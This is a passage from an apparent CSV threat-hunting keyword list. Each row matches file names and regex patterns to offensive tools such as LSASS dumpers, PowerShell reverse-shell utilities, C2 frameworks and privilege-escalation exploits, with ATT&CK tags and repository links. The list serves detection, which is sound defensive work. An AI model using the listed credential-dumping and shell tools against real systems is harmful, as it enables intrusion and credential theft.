T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTDump.sln*",".{0,1000}\\POSTDump\.sln.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTDump.sln*",".{0,1000}\\POSTDump\.sln.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTDump\POSTDump\*",".{0,1000}\\POSTDump\\POSTDump\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTMiniDump\*",".{0,1000}\\POSTMiniDump\\.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTMiniDump\*",".{0,1000}\\POSTMiniDump\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\PotatoTrigger.cpp*",".{0,1000}PotatoTrigger\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*\PotentiallyCrackableAccounts.ps1*",".{0,1000}\\PotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\powercat.ps1",".{0,1000}\\powercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\powercat.ps1*",".{0,1000}\\powercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*\powercat-master\*",".{0,1000}\\powercat\-master\\.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*\powerfun.ps1*",".{0,1000}\\powerfun\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\powerglot\*",".{0,1000}\\powerglot\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\powerkatz.dll*",".{0,1000}\\powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\powerkatz.dll*",".{0,1000}\\powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\powerkatz_x64.dll*",".{0,1000}\\powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\powerkatz_x86.dll*",".{0,1000}\\powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\Powermad*",".{0,1000}\\Powermad.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*\Powermad.ps1*",".{0,1000}\\Powermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\power-pwn\*",".{0,1000}\\power\-pwn\\.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*\PowershellKerberos*",".{0,1000}\\PowershellKerberos.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*\PowerShellRunnerDll.h*",".{0,1000}\\PowerShellRunnerDll\.h.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\PowerTools.ps1*",".{0,1000}\\PowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*\powerup.exe*",".{0,1000}\\powerup\.exe.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Powerup.exe*",".{0,1000}\\Powerup\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Powerup.ps1*",".{0,1000}\\Powerup\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\PowerView.cna*",".{0,1000}\\PowerView\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*\PowerView.exe*",".{0,1000}\\PowerView\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*\Powerview.exe*",".{0,1000}\\Powerview\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\PowerView.ps1*",".{0,1000}\\PowerView\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*\PowerView.ps1*",".{0,1000}\\PowerView\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\PowerView3.*",".{0,1000}\\PowerView3\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","0","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*\ppid_spoofing.exe*",".{0,1000}\\ppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ppl_dump.*",".{0,1000}\\ppl_dump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*\PPLBlade-main*",".{0,1000}\\PPLBlade\-main.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*\PPLFault*",".{0,1000}\\PPLFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*\PPLKiller*",".{0,1000}\\PPLKiller.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*\PPLmedic.cpp*",".{0,1000}\\PPLmedic\.cpp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\PPLmedic.exe*",".{0,1000}\\PPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\PPLmedic\PPLmedic*",".{0,1000}\\PPLmedic\\PPLmedic.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\prefetch_leak.h*",".{0,1000}\\prefetch_leak\.h.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*\prefetch_tool.sln*",".{0,1000}\\prefetch_tool\.sln.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*\prefetch_tool.vcxproj*",".{0,1000}\\prefetch_tool\.vcxproj.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*\printerbug.py*",".{0,1000}\\printerbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\printernightmare.ps1*",".{0,1000}\\printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*\printnightmare.py*",".{0,1000}\\printnightmare\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\PrintSpoofer.cs*",".{0,1000}\\PrintSpoofer\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\PrintSpoofer.csproj*",".{0,1000}\\PrintSpoofer\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\PrintSpoofer-1.0.zip*",".{0,1000}\\PrintSpoofer\-1\.0\.zip.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*\PrivEditor\*",".{0,1000}\\PrivEditor\\.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\privesc.ps1*",".{0,1000}\\privesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*\PrivescCheck*",".{0,1000}\\PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*\PrivescCheck.ps1*",".{0,1000}\\PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\PrivescCheck_*",".{0,1000}\\PrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*\PrivescCheck_*",".{0,1000}\\PrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 